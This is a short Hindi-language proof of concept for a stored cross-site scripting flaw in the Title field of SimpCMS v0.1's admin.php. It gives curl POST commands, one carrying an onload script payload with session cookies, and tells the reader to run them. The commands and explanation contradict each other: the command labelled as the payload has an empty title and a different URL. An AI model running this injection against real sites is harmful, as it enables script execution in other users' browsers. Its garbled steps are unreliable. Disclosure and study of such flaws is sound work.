
SimpCMS v0.1 में Cross Site Scripting (XSS) के लिए प्रकाशन - /SimpCMS/admin.php
SimpCMS v0.1 में एक क्रॉस-साइट स्क्रिप्टिंग (XSS) कमजोरी हमलावरों को /admin.php पर Title फ़ील्ड में इंजेक्ट किए गए एक क्राफ्टेड पेलोड के माध्यम से मनमाना वेब स्क्रिप्ट या HTML निष्पादित करने की अनुमति देती है।
SimpCMS के एडमिन इंटरफ़ेस में लॉग इन करने के बाद, ब्राउज़र के Inspect एलिमेंट में Application टैब में देखे गए अपने संबंधित Cookie मानों को कॉपी करें और निम्नलिखित curl अनुरोध सबमिट करें:
curl -X POST "http://site.com/SimpCMS/admin/index.php" -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0"


SimpCMS सॉफ़्टवेयर के लिए देखे गए प्रारंभिक पैरामीटर निम्नलिखित cURL कमांड में परिणत हुए लेकिन बाद में अपडेट किए गए:
curl -X POST "http://site.com/SimpCMS/admin.php" -d "title=%3Cbody+onload%3Dalert%281%29%3E&text=ee&cat=something&main=1&submit=submit" -b "username=admin; password=PARAMVALUE"
स्पष्टीकरण:
- curl: URL के साथ डेटा स्थानांतरित करने के लिए कमांड-लाइन टूल।
- -X POST: उपयोग करने के लिए अनुरोध विधि निर्दिष्ट करता है (POST)।
- "http://site.com/SimpCMS/admin.php": वह URL जिस पर अनुरोध भेजा जाता है।
- -d "title=&abbrev=random&newSector=" -b "PHPSESSID=c4v4tjh5fpv4po3k5dp5mrb8r0" - POST अनुरोध पेलोड।
XSS पेलोड के साथ POST अनुरोध भेजने के लिए इस कमांड को अपने टर्मिनल में चलाएँ। /SimpCMS मुख्य साइट पर जाएँ और XSS दिखाई देगा।